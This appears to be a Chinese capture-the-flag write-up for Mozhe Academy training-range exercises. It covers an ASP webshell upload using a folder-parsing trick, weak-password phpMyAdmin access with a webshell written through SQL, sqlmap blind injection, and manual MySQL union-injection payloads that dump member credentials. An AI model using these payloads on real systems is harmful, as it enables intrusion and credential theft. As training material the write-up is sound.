墨者学院

 · 2019-12-6  ·次阅读


内部文件上传系统漏洞分析溯源

上传asp一句话木马

QQ截图20191202192741

burp抓包修改文件上传路径 在.asp后缀的文件夹中 文件被默认为asp类型执行

QQ截图20191202192630

QQ截图20191202192639

蚁剑链接

QQ截图20191202192555

phpMyAdmin后台文件包含分析溯源

密码弱口令root登录

QQ截图20191206215606

sql注入一句话

QQ截图20191206215818

蚁剑链接 根目录找到key文件

QQ截图20191206220106

得到key:mozhe6e0dc3709254b6732421f373dce

SQL注入漏洞测试(布尔盲注)

打开靶场,找到停机维护通知页面

QQ截图20191210212136

用sqlmap爆当前库

QQ截图20191210212056

获取到数据库名stormgroup

然后爆表段

QQ截图20191210212751

获取到表member和notice

然后爆字段 得到 name password 和status

QQ截图20191210213301

然后分别猜解name和password

得到name为mozhe password需要md5解码

QQ截图20191210213913

QQ截图20191210213750

QQ截图20191210214158

QQ截图20191210213734

第一个没办法登录 用第二个密码才登录成功,得到key

QQ截图20191210214029

SQL手工注入漏洞测试(MySQL数据库-字符型)

先打开靶场 找到注入页面

QQ截图20191211165444

http://219.153.49.228:45556/new_list.php?id=tingjigonggao后加上'and 1 = 1–+ 发现页面打开正常

QQ截图20191211170335

判断为字符型注入 其实题目已经说明了是字符型注入…

然后获取列表的字段数 后边加上’order by 1–+

将1分别替换为2,3,4,5发现为5的时候显示不正常 那么字段数最大应该为4

QQ截图20191211170717

然后判断回显位置 将=后改为’ union select 1,2,3,4 –+ 得到回显位置为2和3

QQ截图20191211172802

然后获取数据库名 将=后改为’ union select 1,database(),3,4 –+ 得到数据库名mozhe_discuz_stormgroup

QQ截图20191211172640

接着获取表 =后为’ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() and ‘1’=’1 得到两个表notice,stormgroup_member

QQ截图20191211172721

接着获取字段 =后为’ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=’stormgroup_member’ and ‘1’=’1 得到四个字段

QQ截图20191211172958

最后就是查询字段name和password的值 =后为’ union select 1,name,password,4 from stormgroup_member where’1’=’1#

QQ截图20191211174645

md5解码后登录